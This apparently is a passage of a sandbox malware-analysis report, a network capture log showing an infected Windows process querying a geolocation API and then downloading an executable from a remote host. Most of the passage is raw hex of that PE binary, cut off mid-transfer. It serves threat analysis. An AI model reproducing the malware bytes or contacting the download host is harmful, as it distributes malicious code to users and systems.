40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49735	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\759F.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:28:14 UTC	429	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-06-21 02:28:14 UTC	430	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 21 Jun 2023 02:28:14 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-06-21 02:28:14 UTC	430	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49740	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\759F.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:28:15 UTC	431	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-06-21 02:28:15 UTC	431	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 21 Jun 2023 02:28:15 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-06-21 02:28:15 UTC	431	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.3	49741	80.66.203.53	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:28:15 UTC	432	OUT	GET /tmp/index.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: shsplatform.co.uk
2023-06-21 02:28:15 UTC	432	IN	HTTP/1.1 200 OK Date: Wed, 21 Jun 2023 02:28:15 GMT Server: Apache Content-Description: File Transfer Content-Disposition: attachment; filename=10486ed9.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Connection: close Transfer-Encoding: chunked Content-Type: application/octet-stream
2023-06-21 02:28:15 UTC	432	IN	Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 47 99 07 c8 03 f8 69 9b 03 f8 69 9b 03 f8 69 9b 1d aa fc 9b 12 f8 69 9b 1d aa ed 9b 33 f8 69 9b 1d aa ea 9b 65 f8 69 9b 24 3e 12 9b 0a f8 69 9b 03 f8 68 9b 8b f8 69 9b 1d aa e3 9b 02 f8 69 9b 1d aa fd 9b 02 f8 69 9b 1d aa f8 9b 02 f8 69 9b 52 69 63 68 03 f8 69 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2c Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$Giiii3iei$>ihiiiiRichiPEL,
2023-06-21 02:28:15 UTC	440	IN	Data Raw: 84 29 40 00 80 29 40 00 7c 29 40 00 78 29 40 00 74 29 40 00 70 29 40 00 6c 29 40 00 68 29 40 00 64 29 40 00 60 29 40 00 5c 29 40 00 58 29 40 00 54 29 40 00 50 29 40 00 4c 29 40 00 48 29 40 00 44 29 40 00 40 29 40 00 3c 29 40 00 38 29 40 00 34 29 40 00 30 29 40 00 2c 29 40 00 28 29 40 00 24 29 40 00 20 29 40 00 1c 29 40 00 18 29 40 00 14 29 40 00 08 29 40 00 fc 28 40 00 f4 28 40 00 e8 28 40 00 d0 28 40 00 c4 28 40 00 b0 28 40 00 90 28 40 00 70 28 40 00 50 28 40 00 30 28 40 00 10 28 40 00 ec 27 40 00 d0 27 40 00 ac 27 40 00 8c 27 40 00 64 27 40 00 48 27 40 00 38 27 40 00 34 27 40 00 2c 27 40 00 1c 27 40 00 f8 26 40 00 f0 26 40 00 e4 26 40 00 d4 26 40 00 b8 26 40 00 98 26 40 00 70 26 40 00 48 26 40 00 20 26 40 00 f4 25 40 00 d8 25 40 00 b4 25 40 00 90 25 40 Data Ascii: )@)@\|)@x)@t)@p)@l)@h)@d)@`)@\)@X)@T)@P)@L)@H)@D)@@)@<)@8)@4)@0)@,)@()@$)@ )@)@)@)@)@(@(@(@(@(@(@(@p(@P(@0(@(@'@'@'@'@d'@H'@8'@4'@,'@'@&@&@&@&@&@&@p&@H&@ &@%@%@%@%@
2023-06-21 02:28:15 UTC	440	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	440	IN	Data Raw: 32 30 30 30 0d 0a 65 57 69 6e 64 6f 77 00 4d 65 73 73 61 67 65 42 6f 78 41 00 55 53 45 52 33 32 2e 44 4c 4c 00 00 53 75 6e 4d 6f 6e 54 75 65 57 65 64 54 68 75 46 72 69 53 61 74 00 00 00 4a 61 6e 46 65 62 4d 61 72 41 70 72 4d 61 79 4a 75 6e 4a 75 6c 41 75 67 53 65 70 4f 63 74 4e 6f 76 44 65 63 00 00 00 00 43 4f 4e 4f 55 54 24 00 62 61 64 20 61 6c 6c 6f 63 61 74 69 6f 6e 00 00 6e 00 61 00 67 00 65 00 79 00 65 00 76 00 65 00 7a 00 75 00 73 00 61 00 20 00 6e 00 61 00 68 00 69 00 76 00 6f 00 68 00 65 00 78 00 69 00 70 00 65 00 6d 00 65 00 6a 00 65 00 6e 00 61 00 72 00 20 00 67 00 6f 00 62 00 6f 00 6e 00 65 00 7a 00 6f 00 78 00 69 00 77 00 75 00 6c 00 6f 00 79 00 69 00 6c 00 61 00 6b 00 69 00 64 00 69 00 72 00 65 00 77 00 69 00 6a 00 75 00 76 00 65 00 74 00 69 Data Ascii: 2000eWindowMessageBoxAUSER32.DLLSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecCONOUT$bad allocationnageyevezusa nahivohexipemejenar gobonezoxiwuloyilakidirewijuveti
2023-06-21 02:28:15 UTC	448	IN	Data Raw: 5e 5d c2 04 00 8b Data Ascii: ^]
2023-06-21 02:28:15 UTC	448	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	448	IN	Data Raw: 32 30 30 30 0d 0a ff 55 8b ec 8b 45 08 8b 08 85 c9 74 11 e8 ee ea ff ff 85 c0 74 08 8b 10 6a 01 8b c8 ff 12 5d c3 8b ff 55 8b ec 51 6a 00 8d 4d fc e8 13 ff ff ff 68 68 50 47 00 e8 c5 ff ff ff 83 25 68 50 47 00 00 59 8d 4d fc e8 21 ff ff ff c9 c3 a1 68 50 47 00 c3 8b ff 55 8b ec 80 3d 8c 50 47 00 00 75 12 68 20 4c 40 00 c6 05 8c 50 47 00 01 e8 18 06 00 00 59 8b 45 08 a3 68 50 47 00 5d c3 6a 04 b8 e8 f3 46 00 e8 58 23 00 00 6a 00 8d 4d f0 e8 b1 fe ff ff 8b 7d 08 83 65 fc 00 8b 77 0c eb 1f 8b 47 08 4e 8d 04 b0 83 38 00 74 13 8b 08 e8 4f ea ff ff 85 c0 74 08 8b 10 6a 01 8b c8 ff 12 85 f6 77 dd ff 77 08 e8 86 1e 00 00 83 4d fc ff 59 8d 4d f0 e8 95 fe ff ff e8 6e 23 00 00 c3 8b ff 55 8b ec 83 7d 08 00 56 74 2b 8b 71 18 8d 41 04 83 fe 10 72 04 8b 10 eb 02 8b d0 Data Ascii: 2000UEttj]UQjMhhPG%hPGYM!hPGU=PGuh L@PGYEhPG]jFX#jM}ewGN8tOtjwwMYMn#U}Vt+qAr
2023-06-21 02:28:15 UTC	456	IN	Data Raw: 00 00 8b 45 08 8b Data Ascii: E
2023-06-21 02:28:15 UTC	456	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	456	IN	Data Raw: 32 30 30 30 0d 0a 5d 0c 8b 6d fc 8b 63 fc ff e0 5b c9 c2 08 00 58 59 87 04 24 ff e0 58 59 87 04 24 ff e0 58 59 87 04 24 ff e0 8b ff 55 8b ec 51 51 53 56 57 64 8b 35 00 00 00 00 89 75 fc c7 45 f8 4f 6c 40 00 6a 00 ff 75 0c ff 75 f8 ff 75 08 e8 af 88 00 00 8b 45 0c 8b 40 04 83 e0 fd 8b 4d 0c 89 41 04 64 8b 3d 00 00 00 00 8b 5d fc 89 3b 64 89 1d 00 00 00 00 5f 5e 5b c9 c2 08 00 55 8b ec 83 ec 08 53 56 57 fc 89 45 fc 33 c0 50 50 50 ff 75 fc ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 c0 fb ff ff 83 c4 20 89 45 f8 5f 5e 5b 8b 45 f8 8b e5 5d c3 8b ff 55 8b ec 56 fc 8b 75 0c 8b 4e 08 33 ce e8 0f 03 00 00 6a 00 56 ff 76 14 ff 76 0c 6a 00 ff 75 10 ff 76 10 ff 75 08 e8 83 fb ff ff 83 c4 20 5e 5d c3 8b ff 55 8b ec 83 ec 38 53 81 7d 08 23 01 00 00 75 12 b8 8c 6d 40 00 8b Data Ascii: 2000]mc[XY$XY$XY$UQQSVWd5uEOl@juuuE@MAd=];d_^[USVWE3PPPuuuuu E_^[E]UVuN3jVvvjuvu ^]U8S}#um@
2023-06-21 02:28:15 UTC	464	IN	Data Raw: e7 fb ff ff 59 59 Data Ascii: YY
2023-06-21 02:28:15 UTC	464	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	464	IN	Data Raw: 32 30 30 30 0d 0a ff 15 3c 11 40 00 83 4e 04 ff 89 06 33 c0 40 eb 07 e8 92 fb ff ff 33 c0 5f 5e c3 8b ff 55 8b ec 56 57 33 f6 ff 75 08 e8 6a f8 ff ff 8b f8 59 85 ff 75 27 39 05 10 51 47 00 76 1f 56 ff 15 e8 10 40 00 8d 86 e8 03 00 00 3b 05 10 51 47 00 76 03 83 c8 ff 8b f0 83 f8 ff 75 ca 8b c7 5f 5e 5d c3 8b ff 55 8b ec 56 57 33 f6 6a 00 ff 75 0c ff 75 08 e8 ea f8 ff ff 8b f8 83 c4 0c 85 ff 75 27 39 05 10 51 47 00 76 1f 56 ff 15 e8 10 40 00 8d 86 e8 03 00 00 3b 05 10 51 47 00 76 03 83 c8 ff 8b f0 83 f8 ff 75 c3 8b c7 5f 5e 5d c3 8b ff 55 8b ec 56 57 33 f6 ff 75 0c ff 75 08 e8 4d 4a 00 00 8b f8 59 59 85 ff 75 2c 39 45 0c 74 27 39 05 10 51 47 00 76 1f 56 ff 15 e8 10 40 00 8d 86 e8 03 00 00 3b 05 10 51 47 00 76 03 83 c8 ff 8b f0 83 f8 ff 75 c1 8b c7 5f 5e 5d Data Ascii: 2000<@N3@3_^UVW3ujYu'9QGvV@;QGvu_^]UVW3juuu'9QGvV@;QGvu_^]UVW3uuMJYYu,9Et'9QGvV@;QGvu_^]
2023-06-21 02:28:15 UTC	472	IN	Data Raw: 24 85 04 ac 40 00 Data Ascii: $@
2023-06-21 02:28:15 UTC	472	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	472	IN	Data Raw: 32 30 30 30 0d 0a ff 24 8d 00 ad 40 00 90 14 ac 40 00 38 ac 40 00 60 ac 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 00 ad 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 00 ad 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 00 ad 40 00 8d 49 00 b4 ac 40 00 bc ac 40 00 c4 ac 40 00 cc ac 40 00 d4 ac 40 00 dc ac 40 00 e4 ac 40 00 f7 ac 40 00 8b 44 8e 1c 89 44 8f 1c 8b 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89 44 8f 08 8b 44 8e 04 89 44 8f 04 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 Data Ascii: 2000$@@8@`@F#Gr$@IF#GFGr$@F#GFGFGV$@I@@@@@@@@DDDDDDDDDDDDDD$
2023-06-21 02:28:15 UTC	480	IN	Data Raw: ff 83 c4 14 83 c8 Data Ascii:
2023-06-21 02:28:15 UTC	480	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	480	IN	Data Raw: 32 30 30 30 0d 0a ff e9 be 06 00 00 53 57 8b 7d 08 8b c7 c1 f8 05 8d 34 85 20 e2 4f 00 8b 06 83 e7 1f c1 e7 06 03 c7 8a 58 24 02 db d0 fb 89 b5 28 e5 ff ff 88 9d 27 e5 ff ff 80 fb 02 74 05 80 fb 01 75 30 8b 4d 10 f7 d1 f6 c1 01 75 26 e8 5c b7 ff ff 33 f6 89 30 e8 40 b7 ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 c8 b6 ff ff 83 c4 14 e9 43 06 00 00 f6 40 04 20 74 11 6a 02 6a 00 6a 00 ff 75 08 e8 7e fd ff ff 83 c4 10 ff 75 08 e8 69 07 00 00 59 85 c0 0f 84 9d 02 00 00 8b 06 f6 44 07 04 80 0f 84 90 02 00 00 e8 9d bc ff ff 8b 40 6c 33 c9 39 48 14 8d 85 1c e5 ff ff 0f 94 c1 50 8b 06 ff 34 07 89 8d 20 e5 ff ff ff 15 a0 11 40 00 85 c0 0f 84 60 02 00 00 33 c9 39 8d 20 e5 ff ff 74 08 84 db 0f 84 50 02 00 00 ff 15 9c 11 40 00 8b 9d 34 e5 ff ff 89 85 1c e5 ff ff 33 c0 Data Ascii: 2000SW}4 OX$('tu0Mu&\30@VVVVVC@ tjjju~uiYD@l39HP4 @`39 tP@43
2023-06-21 02:28:15 UTC	488	IN	Data Raw: 5f 5e 5b 8b 4d fc Data Ascii: _^[M
2023-06-21 02:28:15 UTC	488	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	488	IN	Data Raw: 31 66 66 38 0d 0a 33 cd e8 ca 83 ff ff c9 c3 8b ff 55 8b ec 8b 4d 08 53 33 db 3b cb 56 57 7c 5b 3b 0d 04 e2 4f 00 73 53 8b c1 c1 f8 05 8b f1 8d 3c 85 20 e2 4f 00 8b 07 83 e6 1f c1 e6 06 03 c6 f6 40 04 01 74 35 83 38 ff 74 30 83 3d 44 11 47 00 01 75 1d 2b cb 74 10 49 74 08 49 75 13 53 6a f4 eb 08 53 6a f5 eb 03 53 6a f6 ff 15 b0 11 40 00 8b 07 83 0c 06 ff 33 c0 eb 15 e8 1c 97 ff ff c7 00 09 00 00 00 e8 24 97 ff ff 89 18 83 c8 ff 5f 5e 5b 5d c3 8b ff 55 8b ec 8b 45 08 83 f8 fe 75 18 e8 08 97 ff ff 83 20 00 e8 ed 96 ff ff c7 00 09 00 00 00 83 c8 ff 5d c3 56 33 f6 3b c6 7c 22 3b 05 04 e2 4f 00 73 1a 8b c8 83 e0 1f c1 f9 05 8b 0c 8d 20 e2 4f 00 c1 e0 06 03 c1 f6 40 04 01 75 24 e8 c7 96 ff ff 89 30 e8 ad 96 ff ff 56 56 56 56 56 c7 00 09 00 00 00 e8 35 96 ff ff Data Ascii: 1ff83UMS3;VW\|[;OsS< O@t58t0=DGu+tItIuSjSjSj@3$_^[]UEu ]V3;\|";Os O@u$0VVVVV5
2023-06-21 02:28:15 UTC	496	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-06-21 02:28:15 UTC	496	IN	Data Raw: 73 dd 58 f2 e5 45 61 e1 51 b4 bd 00 73 25 39 7b 72 d1 95 8f 63 0c 0a 99 fa 65 4f 7e d9 c8 43 0a df 38 71 cf 24 d7 08 09 40 2d 7e 02 d7 81 0e 5a f6 f6 f0 86 2d df 75 7f 91 40 dc e9 2a 8e b3 01 ce 5b 22 9e cc b8 4c c8 69 cb 4d f3 87 c5 d7 76 af f6 27 2b af 98 0a 6c 4e 4f 9e 68 31 0e f6 2f 75 b4 55 c4 2f 03 21 29 4b 08 fd 58 d1 a3 e1 9f 4b 7e 0f 71 37 24 fd d2 9a a4 07 cf a0 ce 63 22 f7 b7 2d 3a 92 97 e0 15 f5 53 fb d5 a2 79 7c ad 73 73 35 5d 44 2b aa f1 49 7a 9e c1 ed bb 29 2e 30 c2 4a 9c 4f f0 3b 48 db d9 c2 0c 3c 1f 27 b9 65 ba 4f a9 22 33 71 eb b0 69 3f 71 79 4f 30 ec ff 7c 20 85 d9 01 60 05 b2 0e cd 9e a3 20 a9 5f c7 73 5b 0d ad ae 5b 0f f3 22 80 17 c3 8f 4d 3e de f5 5d 68 f2 d0 d5 1a 0e ec f3 8d a2 ae b4 79 25 b2 13 9a af fa 30 6c 8a 0d 0c bc 61 eb e8 Data Ascii: sXEaQs%9{rceO~C8q$@-~Z-u@*["LiMv'+lNOh1/uU/!)KXK~q7$c"-:Sy\|ss5]D+Iz).0JO;H<'eO"3qi?qyO0\| ` _s[["M>]hy%0la
2023-06-21 02:28:15 UTC	504	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	504	IN	Data Raw: 32 30 30 30 0d 0a 11 ff 61 aa d6 e0 5c a0 02 17 69 32 03 ec a3 9c 2e 08 d2 3a f5 0a a5 b3 39 7b db 35 d6 86 54 5f 57 1f 88 d1 e3 c1 95 cc 06 d2 84 ad 63 78 5c 99 46 e3 03 b8 48 27 54 23 7c 7f 0b 9c 59 26 67 39 7e 08 a9 79 e5 ad 35 42 f3 c5 b2 5f 6a 80 f6 d8 77 77 48 11 33 6f 37 30 0e d5 aa 53 18 bc 1c 63 c4 ec 38 b1 75 ad 1e ef 29 de 9e 9d b7 fc 0b 98 fc 9b f8 60 60 0a 91 a7 fc c2 0e 58 d1 5a 9a 13 e3 8c a0 29 42 0b 17 c6 3e 91 cb 71 84 60 c5 1e 4f 6a c6 e2 5c 36 e5 c4 1b 33 5d f6 06 58 70 01 52 88 fa 99 c8 c1 cd bc 0b 8d bf ad 67 3c 46 55 39 ae cb 84 dc 86 94 78 4d ba b4 37 d7 f9 5c 33 80 61 ed fd cf 0a 8a de 71 35 ea 9b 56 12 69 85 83 9f 2c 8c b3 7a b7 1b d5 fb 77 34 1a db ef 0f 60 5e 9a e6 76 30 14 73 83 ba 62 e7 d3 47 f8 a7 7d b5 ea 7a 39 d8 63 c0 4a Data Ascii: 2000a\i2.:9{5T_Wcx\FH'T#\|Y&g9~y5B_jwwH3o70Sc8u)``XZ)B>q`Oj\63]XpRg<FU9xM7\3aq5Vi,zw4`^v0sbG}z9cJ
2023-06-21 02:28:15 UTC	512	IN	Data Raw: 89 4a db 6a 24 b6 Data Ascii: Jj$
2023-06-21 02:28:15 UTC	512	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	512	IN	Data Raw: 32 30 30 30 0d 0a 36 0c 6d 03 27 cc 3d 55 0e 82 86 61 71 ef e5 4e e2 c4 cd bf b2 50 69 28 b5 ef f9 63 87 d4 9b 30 55 77 b6 f0 33 98 14 e6 7c 20 2d 0d f5 7b 76 b9 da 2c d5 43 90 de 64 8a cc e4 bd e9 ff fd 26 d9 13 2b 81 0f f2 5f a3 86 34 47 b3 0c 08 4f 5e cf a2 72 d0 12 10 bc 08 27 1e 9b 27 5b be 06 24 e7 67 85 fd 75 75 7b 75 d6 95 4e 16 99 ab ad ec f7 45 25 90 97 c0 43 ea 73 75 df db 1e 66 1b b9 d4 d0 58 39 b0 a9 93 8d fd 36 c0 aa 94 d9 28 df fa bb ac cd 6b c5 dc dd 54 37 19 66 6b e7 e7 66 5b 8f 67 25 f5 fa bd 5a 15 7e 38 a9 3e 2a 34 52 22 cc 80 2d 20 82 25 f7 76 c0 e6 b4 66 34 84 4e 04 71 6c 3c b2 26 7a e7 d2 ed dd 31 2d 4b dd 57 99 12 3b c6 a1 77 06 f4 f2 ce db 8e 5b 40 21 19 2b e7 6f 00 73 bf 8c e0 c2 31 2a e8 6e 08 5e 57 b7 76 ea f2 6c 95 07 4c cd cd Data Ascii: 20006m'=UaqNPi(c0Uw3\| -{v,Cd&+_4GO^r''[$guu{uNE%CsufX96(kT7fkf[g%Z~8>4R"- %vf4Nql<&z1-KW;w[@!+os1n^WvlL
2023-06-21 02:28:15 UTC	520	IN	Data Raw: ec e9 b9 3c 07 67 Data Ascii: <g
2023-06-21 02:28:15 UTC	520	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	520	IN	Data Raw: 32 30 30 30 0d 0a ae 36 72 f4 0c 44 e8 44 ec c6 40 76 76 20 fd cd 34 73 2f 74 82 0f c6 e8 3c d0 ab 77 fc 9a 40 8f af 45 52 3d 73 4b 69 a8 04 79 5c f9 ae 2d 68 af b3 a7 38 14 42 61 1e 7c d1 77 f3 08 36 44 93 8e 72 c2 5e e5 e1 8c 76 4c 2f d6 2d bc 86 7f 80 ec ed b3 c6 94 d0 7f 40 96 31 09 fd 52 f0 3b a2 67 07 86 47 1d 55 4b b5 bc f9 65 a9 ba bf 12 48 21 45 91 12 84 3a 0c c2 b7 df ad b4 cc 80 44 a1 da db e9 42 d1 ea dd 43 f8 25 3a ab 5c d7 5f c9 c0 1c b8 38 03 24 61 ea c7 81 67 e5 a4 fd e5 30 f3 96 21 bf 45 21 5d b2 5d a6 0b a4 ae d1 ac e8 37 8a be fc c0 78 5b fc 22 93 8f 83 8d a0 b6 ea 5a 15 0d 60 94 85 c0 c3 04 14 67 5a cb a1 7a 9e 3a 07 d3 35 fc a4 61 c1 bf 41 74 8a c8 fc 6a 6d 32 c8 90 92 a4 26 f5 1e 8e c6 23 b2 6c 86 a8 ad 04 86 76 96 4c 3f 92 30 2b db Data Ascii: 20006rDD@vv 4s/t<w@ER=sKiy\-h8Ba\|w6Dr^vL/-@1R;gGUKeH!E:DBC%:\_8$ag0!E!]]7x["Z`gZz:5aAtjm2&#lvL?0+
2023-06-21 02:28:15 UTC	528	IN	Data Raw: 53 f0 c9 8d ca 4f Data Ascii: SO
2023-06-21 02:28:15 UTC	528	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	528	IN	Data Raw: 32 30 30 30 0d 0a c8 f0 e1 41 ca 23 b5 99 8f bc 79 51 46 a3 10 20 6c f6 c4 cc 7f 12 4c 28 39 94 57 56 1d 5c 3b ad b8 ff 0f 28 e6 92 33 7c 25 9a 5d e1 0a 78 a1 02 3f 20 40 de 81 6c a2 f8 2b 4b 15 66 b5 4b 59 48 da 00 83 bd 6f c5 2c dc 29 42 f1 94 ad d8 71 e5 46 90 1e ca 3f a0 68 1b d8 b8 32 97 27 26 e3 9d d6 73 6d d0 5c 9b 4a 9c 03 78 df 47 ee 39 1d 7e bd 76 4c 4d 7b 07 5a 7e 55 67 5d d9 38 9d 62 2a 8d 0c 41 15 5d f0 8c 38 54 eb a0 ac f1 dc da ab 46 18 26 04 b0 47 6c 39 d1 a3 8a 05 a4 e6 ca 46 e2 64 28 2c 94 04 a4 86 21 c2 55 3f 85 83 47 e4 37 35 26 3b 41 84 9c a3 6a 77 06 7b f3 ba 6a 6a 5e b2 9c 68 79 06 df c4 de e3 a1 a4 79 a2 81 77 6d b5 46 b6 cf b7 f9 e3 09 a3 e7 db e9 2f d5 6a 6d 57 d5 b7 50 67 bc 9e ab 29 b6 72 5d 55 a4 66 66 31 5c 79 87 8e 44 71 2c Data Ascii: 2000A#yQF lL(9WV\;(3\|%]x? @l+KfKYHo,)BqF?h2'&sm\JxG9~vLM{Z~Ug]8b*A]8TF&Gl9Fd(,!U?G75&;Ajw{jj^hyywmF/jmWPg)r]Uff1\yDq,
2023-06-21 02:28:15 UTC	536	IN	Data Raw: cc 45 de c1 83 9b Data Ascii: E
2023-06-21 02:28:15 UTC	536	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	536	IN	Data Raw: 32 30 30 30 0d 0a fa fb 0f 4d a8 b8 f9 f2 74 eb ad 06 d3 f4 ae 41 9f 5a 50 dc 09 f2 f9 13 0e 2d 30 fe 6b aa 78 00 b1 74 24 5d 8e 5e 08 8a 85 4a 4d 4c b3 4f 96 5f 7a 7d 6f 1c ed 59 8d 69 e1 58 5f 40 cb a3 03 d2 1a cd f3 9d de d9 1f 77 9e 48 4d ab cd ab a4 11 51 51 73 87 98 52 68 28 c7 92 e9 ea f1 4f cf f7 2c f7 a2 a7 9a 65 47 23 d2 eb 5a c9 28 13 35 91 e5 db 60 32 d0 62 4b df 26 b9 7d cb 27 02 b6 08 21 a9 cf 9d e3 94 35 bd 1b 28 29 c7 f7 21 88 01 a6 e3 23 74 4e 99 4d 7c b2 02 ef 99 06 3c 11 ad 72 40 ab 19 c7 72 ec 9c 63 ff e0 ef 12 13 48 9e 9a 71 5c 4f 94 55 c9 af fc a4 44 c4 ab 7d 6d ad 82 91 65 1a f5 07 cf 26 28 95 04 d5 f3 22 00 89 d5 d2 dc f6 33 72 8c c8 91 7e 63 22 b6 46 78 00 b5 e6 55 cc dc b6 fa 9c f4 f0 e6 56 93 61 3f 59 93 59 dc 19 8b a8 28 6b e6 Data Ascii: 2000MtAZP-0kxt$]^JMLO_z}oYiX_@wHMQQsRh(O,eG#Z(5`2bK&}'!5()!#tNM\|<r@rcHq\OUD}me&("3r~c"FxUVa?YY(k
